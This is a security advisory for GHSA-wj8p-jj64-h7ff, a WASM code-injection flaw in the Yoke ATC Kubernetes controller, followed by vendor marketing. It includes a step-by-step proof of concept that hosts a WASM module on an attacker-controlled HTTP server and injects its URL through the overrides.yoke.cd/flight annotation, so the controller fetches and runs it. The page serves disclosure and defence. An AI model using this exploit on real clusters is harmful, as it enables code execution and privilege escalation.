GHSA-wj8p-jj64-h7ff
HIGHGHSA-wj8p-jj64-h7ff is a high-severity (CVSS 8.8) Code Injection vulnerability in github.com/yokecd/yoke. O3 Security confirms whether GHSA-wj8p-jj64-h7ff is actually reachable in your code before you act, and blocks exploitation at runtime until you patch.
Arbitrary WASM Code Execution via AnnotationOverrideFlight Injection in Yoke ATC
Real-World Exposure
github.com/yokecd/yokeReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Arbitrary WASM Code Execution via AnnotationOverrideFlight Injection in Yoke ATC
This vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. It allows users with CR create/update permissions to execute arbitrary WASM code in the ATC controller context by injecting a malicious URL through the overrides.yoke.cd/flight annotation. The ATC controller downloads and executes the WASM module without proper URL validation, enabling attackers to create arbitrary Kubernetes resources or potentially escalate privileges to cluster-admin level.
Recommended CWE: CWE-94 (Improper Control of Generation of Code - Code Injection)
Summary
Yoke ATC allows users to override the Flight WASM module URL via the overrides.yoke.cd/flight annotation on Custom Resources. The controller only checks if the user has update permission on airways resources but does not validate the WASM URL source. An attacker with CR create/update permissions can inject a malicious WASM URL, causing the ATC controller to download and execute arbitrary code.
Details
The vulnerability exists in two code paths:
Source Point - Annotation Definition (pkg/flight/flight.go:41-42):
const (
AnnotationOverrideFlight = "overrides.yoke.cd/flight"
AnnotationOverrideMode = "overrides.yoke.cd/mode"
)
Sink Point 1 - Admission Webhook (cmd/atc/handler.go:298-300):
if overrideURL, _, _ := unstructured.NestedString(cr.Object, "metadata", "annotations", flight.AnnotationOverrideFlight); overrideURL != "" {
xhttp.AddRequestAttrs(r.Context(), slog.Group("overrides", "flight", overrideURL))
takeoffParams.Flight.Path = overrideURL // User-provided URL used directly
}
Sink Point 2 - Reconciler (internal/atc/reconciler_instance.go:264-269):
if overrideURL, _, _ := unstructured.NestedString(resource.Object, "metadata", "annotations", flight.AnnotationOverrideFlight); overrideURL != "" {
ctrl.Logger(ctx).Warn("using override module", "url", overrideURL)
// Simply set the override URL as the flight path and let yoke load and execute the wasm module
takeoffParams.Flight.Path = overrideURL // User-provided URL used directly without validation
}
The permission check at cmd/atc/handler.go:160-177 only verifies update permission on airways resources, not the ability to execute arbitrary WASM code:
accessReview, err := params.Client.Clientset.AuthorizationV1().SubjectAccessReviews().Create(
r.Context(),
&authorizationv1.SubjectAccessReview{
Spec: authorizationv1.SubjectAccessReviewSpec{
ResourceAttributes: &authorizationv1.ResourceAttributes{
Verb: "update",
Group: "yoke.cd",
Version: "v1alpha1",
Resource: "airways", // Only checks airway update permission
},
},
},
)
PoC
Environment Setup
Prerequisites:
- Docker installed and running
- kubectl installed
- Go 1.21+ installed
- kind installed
Step 1: Create Kind cluster
cat > /tmp/kind-config.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: yoke-vuln-test
nodes:
- role: control-plane
EOF
kind create cluster --config /tmp/kind-config.yaml
Step 2: Build and install Yoke CLI
# Clone yoke repository
git clone https://github.com/yokecd/yoke.git
cd yoke
# Build yoke CLI (patch version if needed for compatibility)
GOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke
# Verify installation
/tmp/yoke version
Expected output:
╭───────────────────────────────┬──────────╮
│ yoke │ v0.18.0 │
│ toolchain │ go1.25.6 │
│ k8s.io/client-go │ v0.34.1 │
│ github.com/tetratelabs/wazero │ v1.6.0 │
╰───────────────────────────────┴──────────╯
Step 3: Deploy ATC
/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest
Expected output:
Cluster-access not granted: enable cluster-access to reuse existing TLS certificates.
Generating TLS certificates, this may take a second...
Finished generating TLS certificates.
---
successful takeoff of atc
Step 4: Verify ATC deployment and permissions
kubectl get pods -n atc
kubectl get clusterrolebinding | grep atc
Expected output:
NAME READY STATUS RESTARTS AGE
atc-atc-6d4bcb7665-wvqkt 1/1 Running 0 22s
atc-atc-cluster-role-binding ClusterRole/cluster-admin 22s
Step 5: Deploy Backend Airway example
/tmp/yoke takeoff -wait 60s backendairway "https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz"
Expected output:
successful takeoff of backendairway
Exploitation Steps
Step 1: Create malicious WASM module
Create malicious-wasm.go:
// Malicious WASM module for VUL-001 vulnerability verification
package main
import (
"encoding/json"
"fmt"
)
func main() {
// Create a ConfigMap to prove arbitrary code execution
resource := map[string]interface{}{
"apiVersion": "v1",
"kind": "ConfigMap",
"metadata": map[string]interface{}{
"name": "stolen-credentials",
"namespace": "default",
"labels": map[string]string{
"vulnerability": "VUL-001",
"type": "exfiltrated-token",
},
},
"data": map[string]string{
"vulnerability": "VUL-001: AnnotationOverrideFlight Injection allows arbitrary WASM execution",
"proof": "This ConfigMap was created by malicious WASM code",
},
}
resources := []interface{}{resource}
output, _ := json.Marshal(resources)
fmt.Println(string(output))
}
Compile to WASM:
GOOS=wasip1 GOARCH=wasm go build -o malicious.wasm ./malicious-wasm.go
Step 2: Host malicious WASM
python3 -m http.server 8888 &
Step 3: Get host IP accessible from Kind cluster
HOST_IP=$(ip addr show docker0 | grep 'inet ' | awk '{print $2}' | cut -d/ -f1)
echo "Malicious WASM URL: http://${HOST_IP}:8888/malicious.wasm"
Step 4: Create malicious Backend CR
MALICIOUS_URL="http://${HOST_IP}:8888/malicious.wasm"
kubectl apply -f - <<EOF
apiVersion: examples.com/v1
kind: Backend
metadata:
name: malicious-backend
namespace: default
annotations:
overrides.yoke.cd/flight: "${MALICIOUS_URL}"
spec:
image: nginx:latest
replicas: 1
EOF
Expected output:
backend.examples.com/malicious-backend created
Step 5: Verify exploitation
Check ATC logs:
kubectl logs -n atc deployment/atc-atc | grep -i "override\|malicious"
Actual log output from verification:
{"time":"2026-02-01T13:58:30.4998068Z","level":"INFO","msg":"request served","component":"server","code":200,"method":"POST","path":"/validations/backends.examples.com","elapsed":"375ms","overrides":{"flight":"http://172.17.0.1:8888/malicious.wasm"},"validation":{"allowed":true,"status":""}}
{"time":"2026-02-01T13:56:33.826710613Z","level":"WARN","msg":"using override module","component":"controller","url":"http://172.17.0.1:8888/malicious.wasm"}
Check HTTP server logs (shows WASM download):
172.18.0.2 - - [01/Feb/2026 21:55:58] "GET /malicious.wasm HTTP/1.1" 200 -
172.18.0.2 - - [01/Feb/2026 21:56:32] "GET /malicious.wasm HTTP/1.1" 200 -
172.18.0.2 - - [01/Feb/2026 21:56:33] "GET /malicious.wasm HTTP/1.1" 200 -
Check created ConfigMap:
kubectl get configmap stolen-credentials -n default -o yaml
Actual output from verification:
apiVersion: v1
kind: ConfigMap
metadata:
name: stolen-credentials
namespace: default
labels:
vulnerability: VUL-001
type: exfiltrated-token
app.kubernetes.io/managed-by: atc.yoke
instance.atc.yoke.cd/name: malicious-backend-v2
data:
vulnerability: 'VUL-001: AnnotationOverrideFlight Injection allows arbitrary WASM execution'
Expected Result
The malicious WASM module is downloaded and executed by the ATC controller, creating a ConfigMap named stolen-credentials in the cluster. This proves arbitrary code execution in the ATC controller context.
Impact
Vulnerability Type: Remote Code Execution (RCE) / Code Injection
Attack Prerequisites:
- Attacker has permission to create/update Custom Resources managed by Yoke ATC
- Network access to host malicious WASM (can be external URL)
Impact Assessment:
- Confidentiality: High - Attacker can create resources to exfiltrate data; if ClusterAccess is enabled, can read cluster secrets via host functions
- Integrity: High - Attacker can create/modify arbitrary Kubernetes resources through WASM output
- Availability: Medium - Attacker can disrupt cluster operations by creating malicious resources
Attack Scenario:
- CI/CD developer or application developer with CR permissions creates a Backend CR with malicious annotation
- ATC controller downloads and executes attacker-controlled WASM
- Malicious WASM creates backdoor resources or exfiltrates sensitive data
- If ClusterAccess is enabled, attacker can read secrets and escalate to cluster-admin
Severity
CVSS v3.1 Score: 8.8 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- Attack Vector (AV): Network - Malicious WASM can be hosted externally
- Attack Complexity (AC): Low - Simple annotation injection
- Privileges Required (PR): Low - Only CR create/update permission needed
- User Interaction (UI): None - Automatic execution on CR creation
- Scope (S): Unchanged - Impact within ATC controller context
- Confidentiality (C): High - Can access controller context data
- Integrity (I): High - Can create arbitrary resources
- Availability (A): High - Can disrupt cluster operations
Affected Versions
- Yoke ATC v0.18.x and earlier versions
- All versions that support the
overrides.yoke.cd/flightannotation
Patched Versions
No patch available at time of disclosure.
Workarounds
-
Disable annotation override feature: Remove or disable the
overrides.yoke.cd/flightannotation processing in production environments -
Network policy: Restrict ATC controller's outbound network access to prevent downloading external WASM modules
-
RBAC hardening: Limit CR create/update permissions to trusted users only
-
Admission webhook: Deploy a validating webhook to reject CRs with
overrides.yoke.cd/flightannotations
References
- Yoke Project: https://github.com/yokecd/yoke
- Yoke ATC Documentation: https://yokecd.github.io/docs/airtrafficcontroller/atc/
- CWE-94: Improper Control of Generation of Code: https://cwe.mitre.org/data/definitions/94.html
Credits
credit for: @b0b0haha ([email protected]) @lixingquzhi ([email protected])
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/yokecd/yoke | all versions | No fix |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/yokecd/yoke. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of github.com/yokecd/yoke has shipped for GHSA-wj8p-jj64-h7ff yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-wj8p-jj64-h7ff is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-wj8p-jj64-h7ff. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-wj8p-jj64-h7ff in your dependencies?
O3 detects GHSA-wj8p-jj64-h7ff across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.